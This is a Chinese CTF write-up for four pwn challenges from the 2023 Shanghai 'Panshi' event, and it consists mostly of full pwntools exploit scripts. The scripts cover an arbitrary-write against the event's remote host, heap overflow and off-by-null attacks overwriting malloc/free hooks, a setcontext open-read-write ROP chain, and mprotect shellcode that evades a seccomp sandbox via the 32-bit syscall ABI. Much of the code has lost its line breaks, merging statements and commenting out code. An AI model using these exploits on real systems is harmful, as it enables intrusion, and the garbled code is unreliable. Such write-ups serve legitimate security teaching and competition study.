2023上海“磐石行动”pwn wp


Changeaddr
 

程序提供一次任意地址写,利用它控制程序执行 getflag 函数。

# --- ChangeAddr ---------------------------------------------------------------
# What the service does (its own prompt, below): it lets the client store one
# 4-byte value at any address the client names.  That write-where/write-what
# primitive is the whole vulnerability; the write-up uses it to make the
# program jump into its getflag function.
# Defender's view: a remote peer must never be handed an unvalidated memory
# write.  The fixed 0x0804xxxx addresses below are only usable because the
# binary is a non-PIE 32-bit build; PIE and full RELRO remove such static,
# writable call targets.
from pwn import *
context.log_level='debug'  # echo every byte exchanged; handy when replaying, noisy otherwise
#r=process("./ChangeAddr")
r=remote('116.236.144.37',28526)  # the event's challenge host at the time of writing
r.recvuntil("Now you can write one 4 byte value to memory. Where would you like to write?")
r.sendline("0804C01C")  # destination (hex); presumably a writable pointer the program later calls through -- not verifiable from this listing
r.recvuntil("?")
r.sendline("0804932C")  # value stored there; per the write-up this is the address of getflag
r.recvuntil("segment fault!")  # the program prints this after the write; the script then sends one more line
#gdb.attach(r)
r.sendline("aaaaaa4564564aaadddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd")  # filler for that final read; the write-up does not say why this length was chosen
r.interactive()

Keybox

glibc 2.23 堆溢出

# --- KeyBox (glibc 2.23 per the write-up) -------------------------------------
# Root cause visible in this listing: edit() takes its own length argument,
# independent of the size the item was allocated with, so a 0x30-byte edit of a
# 0x10-byte item overwrites the neighbouring chunk header (a heap overflow).
# The script then (1) forges a large chunk size to get a libc address printed
# back, and (2) corrupts a freed chunk's forward pointer so that an allocation
# is served on top of __malloc_hook.
# Defender's view: the fix is to bound the edit length by the allocation size;
# the second half of the exploit is also version-bound (tcache from glibc 2.26,
# pointer mangling from 2.32, and __malloc_hook removed in 2.34 all change it).
# NOTE: this listing was rendered with line breaks lost -- several statements
# and def bodies share a line, and "#6" on the add(0x68,'a') line swallows the
# edit(...) call that follows it.  The code is kept as rendered.
from pwn import *
context.log_level='debug'
r=process('./KeyBox')
elf=ELF('./KeyBox')
libc=elf.libcr.sendlineafter("Input the first key: ",str(-0x1fffffffffFFFFF4))  # "libc=elf.libc" and the send were two lines originally; the negative 64-bit key presumably passes an entry check the write-up does not explain
r.sendlineafter("Input the second key: ",'1')def show():r.sendlineafter("Your choice:",'1')def add(size,content):r.sendlineafter("Your choice:",'2')r.sendlineafter("Please enter the length of the item:",str(size))r.sendafter("Please enter the name of item:",content)  # menu helpers: 1=show, 2=add(size, content)
def edit(idx,size,content):r.sendlineafter("Your choice:",'3')r.sendlineafter("Please enter the index of item:",str(idx))r.sendlineafter("Please enter the length of item:",str(size))r.sendlineafter("Please enter the new name of the item:",content)  # 3=edit; note the length is caller-chosen, not the item's allocation size
def delete(idx):r.sendlineafter("Your choice:",'4')r.sendlineafter("Please enter the index of item:",str(idx))add(0x10,'a'*0x10)#0
add(0x10,'c'*0x10)#1
add(0x20,'a')#2
add(0x68,'a')#3
add(0x20,'a')#4
add(0x68,'a')#5
add(0x68,'a')#6edit(0,0x30,b'a'*0x10+p64(0)+p64(0xf1))
# The swallowed edit above writes 0x30 bytes into item 0 (allocated 0x10):
# past its own data it sets item 1's size field to 0xf1.
delete(1)  # freed with the forged size; large enough to leave the fastbin range, so libc links it into the unsorted bin
add(0x10,'a')#1
show()  # item 1 now reuses that memory and still holds an arena pointer -> printed back
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-88-0x10-libc.sym['__malloc_hook']  # 88+0x10 is the glibc-2.23 distance from that arena pointer to __malloc_hook
print("libc_base------------>",hex(libc_base))
malloc_hook=libc_base+libc.sym['__malloc_hook']-0x23  # -0x23 lines a fake 0x70-class chunk header up just before the hook (the 0x7f byte of a libc address acts as its size byte)
system=libc_base+libc.sym['system']  # computed but never used below
add(0xc1,'a')delete(6)  # two statements: one more allocation, then item 6 (0x70-class) is freed into the fastbin
edit(5,0xf0,b'a'*0x68+p64(0x71)+p64(malloc_hook))  # overflow from item 5 into freed item 6: keep its size 0x71, point its fd at the fake chunk
add(0x68,'/bin/sh\x00')#6  -- first allocation returns item 6 again; its content is not used afterwards
add(0x68,b'a'*0x13+p64(0x401765))  # second one is served from malloc_hook-0x23: 0x13 bytes of padding, then 0x401765 lands on __malloc_hook (a binary address; the write-up does not say what it is)
r.sendlineafter("Your choice:",'2')
r.sendlineafter("Please enter the length of the item:",str(0x20))# gdb.attach(r)
# The allocation request above makes malloc run the overwritten hook.
r.interactive()

ssql

 程序实现了用堆块进行数据库管理,一共有申请,释放,编辑,打印四个功能。首先是创建table,然后每个table可以创建多个column,需要逆向出数据库这四个功能的对应语句结构,才能使用这四个功能。

漏洞点是 edit 函数中的 strcpy 会在末尾多写一个 \x00,造成 off-by-null。

通过溢出0字节,可以改堆块指针,同时在对应的地方伪造一个chunk造成堆块重叠。

# --- ssql ---------------------------------------------------------------------
# The service is a toy SQL-like table/column manager backed by heap chunks.
# Per the write-up, EDIT copies the column content with strcpy, so the
# terminator lands one byte past the buffer (off-by-null).  The script uses
# that plus forged chunk metadata to make chunks overlap, reads a heap and a
# libc address back through SHOW, and finally points __free_hook at a
# one_gadget.
# Defender's view: size the destination for strlen+1 (or use a length-bounded
# copy), and clear memory on allocation so SHOW cannot print stale free-list
# pointers.  The hook-based finish no longer exists in glibc >= 2.34.
# NOTE: line breaks were lost in this rendering; the helper defs below share
# one physical line.  The code is kept as rendered.
from pwn import *
context.log_level='debug'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libcdef add(idx):r.sendafter("mysql > ",'CREATE TABLE {}'.format(idx))def delete(idx):r.sendafter("mysql > ",'DELETE TABLE {}'.format(idx))def show(idx):r.sendafter("mysql > ",'SHOW  TABLE {}'.format(idx))def add_c(c,idx):r.sendafter("mysql > ",'CREATE {} TABLE {}'.format(c,idx))def delete_c(c,idx):r.sendafter("mysql > ",'DELETE {} FROM {}'.format(c,idx))def edit_c(c,idx,name,content):r.sendafter("mysql > ",'EDIT {} FROM {}'.format(c,idx))r.sendafter("Column name:",name)r.sendafter("Column Content: ",content)#----------------leak_heap-----------------
# Heap leak: free two columns, create one again, and SHOW prints the content
# of the re-used chunk, which still contains a pointer left by the allocator.
add(1)
add_c(0,1)
add_c(1,1)
delete_c(1,1)
delete_c(0,1)
add_c(0,1)
show(1)
r.recvuntil("Column Content: ")
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x470  # 0x470: offset of that chunk from the heap start for this binary; a layout constant, not derivable here
print("heap_base------------>",hex(heap_base))#---------------------leak_libc-----------------
for i in range(6):add_c(i+1,1)  # six more columns so the later fake chunk has real memory behind it
payload=b'\x00'*0xc0+p64(0)+p64(0x541)+p64(0x31)+p64(0)+p64(heap_base+0x400)  # forged chunk header (size 0x541) and pointer fields; strcpy's extra terminator is the off-by-null that makes the next free/alloc cycle accept them
edit_c(0,1,b'a'*0x10,payload)
delete(1)  # DELETE TABLE frees the table and its columns; with the forged sizes the freed regions overlap
add(1)
add_c(0,1)
add_c(1,1)
show(1)  # a re-used chunk now exposes an arena pointer
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x10-96-libc.sym['__malloc_hook']  # 0x10+96: distance from that arena pointer to __malloc_hook for this libc build
print("libc_base----------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
one_gadget=[0xe3afe,0xe3b01,0xe3b04]  # offsets found with the one_gadget tool; specific to this libc build
ogg=libc_base+one_gadget[1]
add_c(2,1)
add_c(3,1)
edit_c(0,1,b'a'*0x10,b'b'*0xc0+p64(0)+p64(0x31)*2+p64(0)+p64(heap_base+0x540)+p64(heap_base+0x300)+p64(heap_base+0x590))  # rewrite the table's column-pointer area through the overlap; the heap offsets are debugger-recovered layout constants
edit_c(2,1,b'a'*7,b'\x00'*0x10+p64(heap_base+0x590)+p64(0x111))  # fake chunk of size 0x111 at heap_base+0x590
delete(1)
add(1)
add_c(0,1)
add_c(1,1)edit_c(1,1,b'a'*7,p64(0)*3+p64(0x111)+p64(free_hook))  # two statements: the edit plants __free_hook as a column's content pointer
add_c(2,1)
add_c(3,1)
edit_c(3,1,b'a'*0x10,p64(ogg))  # column 3's content now aliases __free_hook; this writes the gadget address into it
delete(1)  # the next free() runs the hook
# gdb.attach(r)
r.interactive()

hp

这个题主要是逆向难度大,需要逆向出堆块申请等功能对应的语句,不过跟http协议头有点类似。

首先要调用 login 函数使 dword_5280=1,然后才能执行其他功能。

漏洞点在 edit 函数中有一个 off-by-null。

由于这个题有沙箱,因此需要 orw(open/read/write)读取 flag。

思路1:先改freehook为setcontext,然后在对应堆块中写orw链并执行。

思路2:改 freehook 为 setcontext,然后执行 mprotect 将 heap 段权限改为 7(rwx),再在对应堆块里写 shellcode:开辟内存写 flag,调用 32 位 open,再 read/write。

exp1

# --- hp, exp1: off-by-null -> __free_hook = setcontext -> ORW ROP chain -------
# The service speaks an HTTP-like request format; the helpers below wrap each
# operation.  Per the write-up: login() is required first (it sets dword_5280),
# edit has an off-by-null, and a syscall sandbox forces an open/read/write
# chain instead of a shell.
# Defender's view: the request parser copies one byte too many (Content-Length
# is sent as len-1 everywhere, which suggests the server writes len+1 bytes --
# not verifiable from this listing); bounding that copy removes the primitive.
# The finish depends on __free_hook, which glibc >= 2.34 no longer has.
# NOTE: line breaks were lost in this rendering; helper defs, a for loop, and
# the nested while loop each sit on one physical line, and the "# sys_read"
# comment inside the orw dict comments out the rest of that line.  The code is
# kept as rendered.
from pwn import *
context.log_level='debug'
context.arch='amd64'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc
def login():payload='POST /login HTTP/1.0 \nUsername:'+'a'*0x20+'\x01\n'+'Password:aaaa\r\n\n'r.sendafter("parser> ",payload)  # 0x20-byte username followed by \x01; per the write-up this is what flips the login flag
def add(cont):payload='POST /create HTTP/1.0 \nContent-Length:'+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)  # allocation size follows from the declared length
def delete(idx):payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def show(idx):payload='POST /show HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def edit(idx,cont):payload='POST /edit HTTP/1.0 \nIdx:' + str(idx) +'\n'+"Content-Length:"+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)#------------leak----------------------#
login()
add('a'*0x440)#0  -- large enough to bypass the per-thread cache when freed
add('a'*2)#1  -- keeps item 0 from merging with the top chunk
delete(0)
add('a'*0x18)#0  -- carves the front of the freed region; the allocator's pointers remain behind the new data
show(0)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']  # 0x410+96: distance from the leaked arena pointer to __malloc_hook for this libc build
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
r.recv(10)
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250  # a heap pointer follows in the same output; 0x250 is its offset from the heap start
print("heap_base----------->",hex(heap_base))
pop_rax_ret = libc_base + 0x000000000001b500  # gadget offsets: valid only for this exact libc build
pop_rdi_ret= libc_base + 0x000000000002164f
pop_rsi_ret = libc_base + 0x0000000000023a6a
pop_rdx_ret = libc_base + 0x0000000000001b96
syscall_ret = libc_base + 0x00000000000d2625
open_=libc_base+libc.sym['open']
add('a'*0x420)#2
add('a'*0x439)#3
for i in range(3):#456add('a'*0x109)add('a'*0x4f0)#7
# (the loop body and the add(0x4f0) were separate lines originally)
add('c'*0x20)#8
edit(6,'a'*0x108+'\x01')  # the extra terminator written by edit lands on the next chunk's size field
for i in range(8,-1,-1):edit(6,'a'*(0x100+i)+'\x01')  # descending writes move the terminator back one byte at a time, clearing the bytes before the size field
edit(6,'a'*0x101+p16(0x440+0x330).decode())  # then the neighbour's size is rewritten to 0x770 so it spans items 3..7
delete(3)
delete(7)  # freeing the enlarged chunk consolidates over the live items in between
add('a'*0x400)#3
delete(4)
add('b'*0x50)#4  -- overlaps freed item 4's metadata
edit(4,'a'*0x31+p64(free_hook)[0:6])  # overwrite the freed chunk's forward pointer with __free_hook (6 bytes, the 0x31st byte being the terminator position)
add('a'*0x109)#7
add('b'*0x109)#9  -- served at __free_hook itself
edit(9,'a'+p64(setcontext+53)[0:6])  # __free_hook = setcontext+53; the +53 entry point is specific to this libc's setcontext
add('b'*0x500)#10flag_addr=heap_base+0xb40
# (flag_addr was its own line originally: the address where "flag\0" will sit inside item 10)
data=free_hook+0x100
orw={0x98:{0x0:heap_base+0xc40,0x8:pop_rdi_ret+1},0xf8:{0x0:[pop_rdi_ret,flag_addr,pop_rsi_ret,0,open_,pop_rax_ret,  # sys_read(flag_fd, heap, 0x100)0,pop_rdi_ret,3,pop_rsi_ret,heap_base+0x200,pop_rdx_ret,0x40,syscall_ret,pop_rax_ret,  # sys_write(1, heap, 0x100)1,pop_rdi_ret,1,pop_rsi_ret,heap_base+0x200,pop_rdx_ret,0x40,syscall_ret]}}payload='flag\x00\x00\x00\x00'+flat(orw)i = len(payload) - 1
# orw: a fake context laid out in item 10 (0x98 -> rsp, 0xf8 -> rip/ret); when
# free(item 10) enters setcontext, rsp moves to the chain that opens "flag",
# reads it into the heap, and writes it to stdout.  The dict and the two
# assignments after it were separate lines originally.
while i >= 0:if payload[i] == '\x00':edit(10,'a'+ 'b' * i)i = i - 1else:j = iwhile payload[j] != '\x00':j = j - 1edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])i = j
# Write loop (rendered on one line): edit cannot carry a null byte mid-content,
# so the payload is written back-to-front, one null-delimited segment per edit,
# using the terminator itself to place each zero.
gdb.attach(r)  # debugger hook; would block a non-interactive run
delete(10)r.interactive()  # freeing item 10 runs the hook

exp2

# --- hp, exp2: same setup as exp1, then mprotect(heap) + 32-bit-ABI shellcode --
# Identical to exp1 up to the __free_hook overwrite.  Instead of a ROP chain,
# the fake context calls mprotect on the heap and returns into shellcode.  That
# shellcode issues its open/mmap through int 0x80 (the 32-bit syscall ABI) and
# only read/write through syscall -- i.e. it assumes the sandbox filters
# 64-bit syscall numbers only.
# Defender's view: a seccomp filter must check the arch field of seccomp_data
# (or kill on any non-native ABI); number-only filters are bypassed exactly
# this way.  A non-executable, non-mprotect-able heap (mprotect filtered) also
# removes the second stage.
# NOTE: line breaks were lost in this rendering; helper defs, loops, the
# SigreturnFrame setup and the shellcode string all share physical lines.
# The code is kept as rendered.
from pwn import *
context.log_level='debug'
context.arch='amd64'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc
def login():payload='POST /login HTTP/1.0 \nUsername:'+'a'*0x20+'\x01\n'+'Password:aaaa\r\n\n'r.sendafter("parser> ",payload)  # 0x20-byte username followed by \x01 sets the login flag (per the write-up)
def add(cont):payload='POST /create HTTP/1.0 \nContent-Length:'+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)  # Content-Length is sent as len-1 throughout; presumably the server copies one byte more than declared
def delete(idx):payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def show(idx):payload='POST /show HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def edit(idx,cont):payload='POST /edit HTTP/1.0 \nIdx:' + str(idx) +'\n'+"Content-Length:"+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)#------------leak----------------------#
login()
add('a'*0x440)#0
add('a'*2)#1
delete(0)
add('a'*0x18)#0
show(0)  # stale allocator pointers in the re-used chunk are printed back: libc first, then a heap address
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']  # 0x410+96: arena-pointer-to-__malloc_hook distance for this libc build
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
mprotect=libc_base+libc.sym['mprotect']
r.recv(10)
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250
print("heap_base----------->",hex(heap_base))add('a'*0x420)#2
add('a'*0x439)#3
for i in range(3):#456add('a'*0x109)add('a'*0x4f0)#7
add('c'*0x20)#8
edit(6,'a'*0x108+'\x01')  # the terminator edit appends lands on the next chunk's size field
for i in range(8,-1,-1):edit(6,'a'*(0x100+i)+'\x01')  # clear the preceding bytes one at a time, back to front
edit(6,'a'*0x101+p16(0x440+0x330).decode())  # rewrite that size to 0x770 so the chunk spans items 3..7
delete(3)
delete(7)  # consolidation over live items -> overlap
add('a'*0x400)#3
delete(4)
add('b'*0x50)#4  -- overlaps freed item 4
edit(4,'a'*0x31+p64(free_hook)[0:6])  # redirect the freed chunk's forward pointer to __free_hook
add('a'*0x109)#7
add('b'*0x109)#9  -- served at __free_hook
edit(9,'a'+p64(setcontext+53)[0:6])  # __free_hook = setcontext+53 (entry offset specific to this libc)
add('b'*0x500)#10frame=SigreturnFrame()
# (frame=SigreturnFrame() was its own line originally)  The frame below is the
# register file setcontext will load: rdi/rsi/rdx are mprotect's arguments
# (heap_base, 0x1000, 7 = rwx), rip = mprotect, rsp = a slot inside item 10
# that holds the return address into the shellcode.
frame.rdi=heap_base
frame.rsi=0x1000
frame.rdx=0x7
frame.rip=mprotect
frame.rsp=heap_base+0xc38shellcode='''mov rax, 192     mov rbx, 0x400000mov rcx, 0x1000mov rdx, 7mov rsi, 0x100022mov rdi, 0int 0x80mov rsp, 0x400108push 0x67616c66mov rax, 5       mov rbx, 0x400100mov rcx, 0mov rdx, 0int 0x80mov rdi, 3  mov rax, 0mov rsi, rspmov rdx, 0x50syscallmov rax,1          mov rdi,1syscall'''payload = str(frame)+p64(heap_base+0xc40)+asm(shellcode,arch='amd64')
# The shellcode string above lost its newlines in rendering.  Its int 0x80
# calls use 32-bit syscall numbers (192 = mmap2 at 0x400000, 5 = open on the
# "flag" bytes pushed to that mapping); the following read (fd 3) and write
# (fd 1) use the 64-bit syscall instruction.  payload = frame + return slot +
# code, all placed in item 10.
i = len(payload) - 1
while i >= 0:if payload[i] == '\x00':edit(10,'a'+ 'b' * i)i = i - 1else:j = iwhile payload[j] != '\x00':j = j - 1edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])i = j
# Back-to-front write loop (one line in this rendering): each edit ends at a
# null, so the payload is written one null-delimited segment at a time.
gdb.attach(r)  # debugger hook; would block a non-interactive run
delete(10)  # free(item 10) -> __free_hook -> setcontext -> mprotect -> shellcode
r.interactive()

执行后得到 flag

 

